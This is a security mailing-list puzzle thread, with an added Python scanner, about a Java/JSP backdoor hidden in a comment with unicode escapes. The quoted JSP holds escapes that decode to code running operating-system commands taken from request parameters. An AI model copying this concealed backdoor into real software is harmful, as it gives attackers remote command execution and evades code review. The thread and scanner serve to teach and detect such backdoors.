[Owasp-turkey] Spot the Bug #4

Bedirhan Urgun bedirhanurgun at gmail.com
Tue Oct 20 11:38:07 EDT 2009


I thought this one would draw more interest than the others... :)) it didn't

The answer: a backdoor written with the logic "everyone trusts the developers, but they can wreck production". Java allows code to be written with unicode characters in a specific format (\uxxxx). That is, all identifiers, keywords, operators, etc. do not have to be ASCII. (C# does have such a restriction; for keywords and operators, for example, only ASCII characters can be used.) In short, if you take the part written in unicode format in the JSP I gave, put a ' character at its beginning and end, and then

http://www.webguvenligi.org/ipacker/ipacker.html

paste it into the INPUT section of that application and press the EVAL TO OUTPUT button, you can see what kind of backdoor the developer actually wrote. The resulting piece closes the multiline comment section, writes the actual backdoor code, and then reopens the multiline comment section (so that we don't get a "syntax error", just like SQLi, LDAPi).

This makes the job harder for an auditor who is looking with the naked eye or trying to audit with regexes.

bedirhan

On 18 October 2009 at 21:05, Bedirhan Urgun <bedirhanurgun at gmail.com> wrote:

>
> This time there's a fun bug :) It requires looking at the problem from a different perspective. A JSP page...
>
> bedirhan
>
> Spot the Bug #4
> --------------------
>
> <%@page contentType="text/html" pageEncoding="UTF-8"%>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>    "http://www.w3.org/TR/html4/loose.dtd">
> <html>
>     <head>
>         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
>         <title>BankHorizon Welcome Page</title>
>         <link rel="stylesheet" type="text/css" href="style.css" />
>     </head>
>     <body>
>         <% /* Include the header page */ %>
>         <jsp:include page="header.jsp" />
>         <% /* Include the menu page */ %>
>         <jsp:include page="menu.jsp" />
>         <% /* Include the footer menu left page */ %>
>         <jsp:include page="footer_menu_left.jsp" />
>         <h2></h2>
>         <jsp:include page="data_validation.jsp" />
>         <%
>             /************************************COMMENT
> BEGIN**************************************
>            This is unicode that will be used for data validation
>
> \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a
>             *************************************COMMENT
> END***********************************/
>             String lang = request.getParameter("language");
>             // use the unicode above to validate the data
>             validateUnicode(lang);
>         %>
>         <br/>
>         <% /* Include the footer bottom page */ %>
>         <jsp:include page="footer_bottom.jsp" />
>     </body>
> </html>
>



-- 
Bedirhan Urgun
http://www.webguvenligi.org
http://www.owasp.org/index.php/Turkey

To subscribe to the Turkish Web Application Security mailing list:
https://lists.owasp.org/mailman/listinfo/owasp-turkey
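The audit problem raised in the post (a reviewer or a regex-based scanner sees a comment, javac sees code) can be checked mechanically. The following script is an added example, not code from the post or from OWASP Turkey: it emulates javac's unicode-escape translation (JLS 3.3, which runs before the lexer sees comment delimiters), decodes every `/* ... */` comment in a source file, and reports comments whose decoded body contains `*/`, since everything after that point compiles as live code. It also lists escapes that decode to printable ASCII, which legitimate code has little reason to use. The sample JSP is constructed here with a harmless payload in the same shape as the listing above; the scanner is deliberately simple and does not handle `//` comments or `/*` sequences inside string literals.

```python
"""Audit helper: find Java/JSP sources where \\uXXXX escapes hide live code
inside a comment. Emulates javac's escape translation, which runs before the
lexer sees comment delimiters (JLS 3.3)."""
import re

# A backslash starts a unicode escape only when it is preceded by an even
# number of backslashes, and the 'u' may be repeated ("\uu0041" is legal).
UNICODE_ESCAPE = re.compile(r'(?<!\\)((?:\\\\)*)\\u+([0-9A-Fa-f]{4})')
# Block comments as a naive text scanner (or a human) sees them in the raw file.
BLOCK_COMMENT = re.compile(r'/\*.*?\*/', re.DOTALL)


def translate_unicode_escapes(src: str) -> str:
    """Replace every \\uXXXX escape with the character it denotes, as javac does."""
    return UNICODE_ESCAPE.sub(lambda m: m.group(1) + chr(int(m.group(2), 16)), src)


def ascii_escapes(src: str) -> list:
    """Escapes that decode to printable ASCII. Real code has little reason to
    spell '*', '/' or letters this way, so any hit deserves a look."""
    return [chr(int(m.group(2), 16)) for m in UNICODE_ESCAPE.finditer(src)
            if 0x20 <= int(m.group(2), 16) < 0x7F]


def find_comment_escapes(src: str) -> list:
    """For each /* ... */ comment in the raw text, decode its escapes and report
    the ones javac would close early because the decoded body contains '*/'.
    The text between that '*/' and the next '/*' (or the end) compiles as code."""
    findings = []
    for m in BLOCK_COMMENT.finditer(src):
        decoded = translate_unicode_escapes(m.group(0)[2:-2])
        if '*/' in decoded:
            live = decoded.split('*/', 1)[1].split('/*', 1)[0]
            findings.append({'offset': m.start(), 'live_code': live.strip()})
    return findings


# Constructed sample in the same shape as the mailing-list JSP, with a harmless
# payload: the escapes spell '*/ System.out.println("hidden"); /*'.
SAMPLE_JSP = r'''<%
    /* lookup table used for data validation
    \u002a\u002f System.out.println("hidden"); \u002f\u002a
    */
    String lang = request.getParameter("language");
%>'''

if __name__ == '__main__':
    for f in find_comment_escapes(SAMPLE_JSP):
        print(f"comment at offset {f['offset']} hides code: {f['live_code']}")
    print('printable-ASCII escapes:', ''.join(ascii_escapes(SAMPLE_JSP)))
```

Run it over a source tree with a file loop around `find_comment_escapes`; a clean code base should produce no findings at all, and the `ascii_escapes` list is a cheap first filter because it fires on the escape-spelled `*` and `/` that this trick needs.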

